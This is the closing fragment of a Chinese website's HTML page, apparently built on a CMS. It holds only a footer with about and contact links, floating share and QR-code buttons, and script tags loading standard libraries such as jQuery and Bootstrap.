                    <ul class="list-unstyled list-inline mt-2">
                        <li><a href="/p/aboutus.html" target="_blank">关于网站</a></li>
                        <li><a href="/contactus.html" rel="nofollow" target="_blank">联系我们</a></li>
                    </ul>
                    </div>

                </div>
            </div>
        </div>
    </div>
</footer>

<div id="floatbtn">
    <!-- S 浮动按钮 -->

        <a class="hover" href="/index/cms.archives/post.html" target="_blank">
        <i class="iconfont icon-pencil"></i>
        <em>立即<br>投稿</em>
    </a>
    
    <div class="floatbtn-item floatbtn-share">
        <i class="iconfont icon-share"></i>
        <div class="floatbtn-wrapper" style="height:50px;top:0">
            <div class="social-share" data-initialized="true" data-mode="prepend">
                <a href="#" class="social-share-icon icon-weibo" target="_blank"></a>
                <a href="#" class="social-share-icon icon-qq" target="_blank"></a>
                <a href="#" class="social-share-icon icon-qzone" target="_blank"></a>
                <a href="#" class="social-share-icon icon-wechat"></a>
            </div>
        </div>
    </div>

        <a href="javascript:;">
        <i class="iconfont icon-qrcode"></i>
        <div class="floatbtn-wrapper">
            <div class="qrcode"><img src="https://www.imspm.com/assets/img/gongzhonghao.jpg"></div>
            <p>微信公众账号</p>
            <p>微信扫一扫加关注</p>
        </div>
    </a>
    
    <a id="back-to-top" class="hover" href="javascript:;">
        <i class="iconfont icon-backtotop"></i>
        <em>返回<br>顶部</em>
    </a>
    <!-- E 浮动按钮 -->
</div>


<script type="text/javascript" src="/assets/libs/jquery/dist/jquery.min.js?v=1.0.10"></script>
<script type="text/javascript" src="/assets/libs/bootstrap/dist/js/bootstrap.min.js?v=1.0.10"></script>
<script type="text/javascript" src="/assets/libs/fastadmin-layer/dist/layer.js?v=1.0.10"></script>
<script type="text/javascript" src="/assets/libs/art-template/dist/template-native.js?v=1.0.10"></script>
<script type="text/javascript" src="/assets/addons/cms/js/jquery.autocomplete.js?v=1.0.10"></script>
<script type="text/javascript" src="/assets/addons/cms/js/swiper.min.js?v=1.0.10"></script>
<script type="text/javascript" src="/assets/addons/cms/js/share.min.js?v=1.0.10"></script>
<script type="text/javascript" src="/assets/addons/cms/js/cms.js?v=1.0.10"></script>


<script type="text/javascript" src="/assets/addons/cms/js/common.js?v=1.0.10"></script>

</body>
</html>